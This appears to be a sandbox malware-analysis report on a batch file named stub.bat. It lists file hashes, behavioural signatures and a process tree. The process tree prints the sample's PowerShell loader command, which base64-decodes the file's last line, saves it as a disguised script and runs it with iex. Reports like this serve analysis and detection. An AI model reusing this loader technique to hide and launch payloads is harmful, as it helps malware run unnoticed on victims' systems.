Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
361s -
max time network
363s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
08/07/2024, 15:19
Static task
static1
Behavioral task
behavioral1
Sample
stub.bat
Resource
win7-20240708-en
4 signatures
600 seconds
Behavioral task
behavioral2
Sample
stub.bat
Resource
win10v2004-20240708-en
14 signatures
600 seconds
Behavioral task
behavioral3
Sample
stub.bat
Resource
win11-20240704-en
17 signatures
600 seconds
General
-
Target
stub.bat
-
Size
3.4MB
-
MD5
c27b8c9f05c86817d8d287f0d0bd8698
-
SHA1
239748a1871a85c7df6733bc24d9497a331aca87
-
SHA256
cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
-
SHA512
fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
-
SSDEEP
49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n
Score
3/10
Malware Config
Signatures
-
pid Process 2368 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2368 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2368 2136 cmd.exe 31 PID 2136 wrote to memory of 2368 2136 cmd.exe 31 PID 2136 wrote to memory of 2368 2136 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\stub.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $env:LOCALAPPDATA\`$ktm-powershell.exe; $data = Get-Content -Path 'C:\Users\Admin\AppData\Local\Temp\stub.bat'; $lines = $data -split '\n';$last_line = $lines[-1]; $last_line = [Convert]::FromBase64String($last_line.Replace('\n', '')); $last_line = [System.Text.Encoding]::Unicode.GetString($last_line); [System.IO.File]::WriteAllText($env:LOCALAPPDATA + '\\$ktm-loader.ps1', $last_line); $last_line | iex"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2368
-